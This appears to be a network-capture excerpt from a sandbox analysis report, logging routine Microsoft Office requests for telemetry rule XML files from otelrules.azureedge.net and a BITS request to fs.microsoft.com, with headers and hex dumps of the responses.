                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              81192.168.2.64980313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:49 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:49 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                              ETag: "0x8DC582BB464F255"
                                                                                                                                                                              x-ms-request-id: 02a30eba-b01e-0001-5b7b-3b46e2000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073049Z-178bfbc474bwh9gmhC1NYCy3rs000000018g000000004nfc
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:49 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              82192.168.2.64980513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:49 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:49 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                              x-ms-request-id: 391e256c-401e-00ac-3fcb-3b0a97000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073049Z-r1d97b995777mdbwhC1TEBezag00000009x000000000k1t0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:50 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              83192.168.2.64980813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:50 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:50 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:50 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                              ETag: "0x8DC582B984BF177"
                                                                                                                                                                              x-ms-request-id: 1a92378f-b01e-005c-6f7b-3b4c66000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073050Z-1777c6cb754ww792hC1TEBzqu40000000ang000000006wyn
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              84192.168.2.64980913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:50 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:50 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 405
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                              ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                              x-ms-request-id: d7880247-601e-0070-328c-3aa0c9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073050Z-r1d97b9957744xz5hC1TEB5bf800000009z0000000004wcx
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:51 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              85192.168.2.64980713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:50 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:50 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                              x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073050Z-1777c6cb754whff4hC1TEBcd6c00000009b000000000euyu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              86192.168.2.64981113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:51 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:51 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                              ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                              x-ms-request-id: 1e58b78d-401e-0029-678d-3b9b43000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073051Z-1777c6cb754n67brhC1TEBcp9c0000000ayg0000000000eh
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              87192.168.2.64981313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:51 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:52 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:52 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 174
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                              ETag: "0x8DC582B91D80E15"
                                                                                                                                                                              x-ms-request-id: 6a968014-801e-0015-537c-3bf97f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073052Z-178bfbc474bxkclvhC1NYC69g4000000010000000000dy41
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:52 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              88192.168.2.649814184.28.90.27443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:52 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                              2024-11-21 07:30:52 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                              Server: ECAcc (lpl/EF70)
                                                                                                                                                                              X-CID: 11
                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                              X-Ms-Region: prod-neu-z1
                                                                                                                                                                              Cache-Control: public, max-age=206079
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:52 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-CID: 2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              89192.168.2.64981513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:52 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:52 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1952
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                              ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                              x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073052Z-178bfbc474bbcwv4hC1NYCypys000000013g000000000t9g
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:53 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              90192.168.2.64981613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:52 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:53 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:53 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 958
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                              ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                              x-ms-request-id: 28a3992e-001e-0028-777f-3bc49f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073053Z-1777c6cb7544n7p6hC1TEByvb40000000atg00000000kn19
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:53 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              91192.168.2.64981713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:53 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:53 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 501
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                              ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                              x-ms-request-id: 6a1e2df9-c01e-008d-338c-3a2eec000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073053Z-1777c6cb754gc8g6hC1TEB966c0000000aqg00000000dwn7
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
